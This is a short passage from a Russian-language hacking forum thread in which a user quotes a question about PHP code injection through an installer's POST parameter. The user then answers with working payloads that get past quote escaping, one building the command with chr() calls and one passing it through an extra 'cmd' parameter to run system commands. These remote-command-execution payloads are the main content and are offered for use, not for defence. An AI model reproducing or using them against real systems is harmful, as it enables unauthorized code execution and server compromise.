22.09.2016, 00:29
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Nz2
Nz2 said:
↑
Добырый день
есть пост запрос
Код:
Code:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system(ls))}\
Кавычки экранируются, подскажите как обойти? base64 не помогло функцией chr()
Код:
Code:
@print(system(CHR(108).CHR(115).CHR(32).CHR(45).CHR(108).CHR(97)))
или подстановкой пост параметра:
Код:
Code:
submit=Proceed%20to%20next%20step&dbhost=1&dbms=${@print(system($_POST[cmd]))}\&cmd=ls -la
|
|
|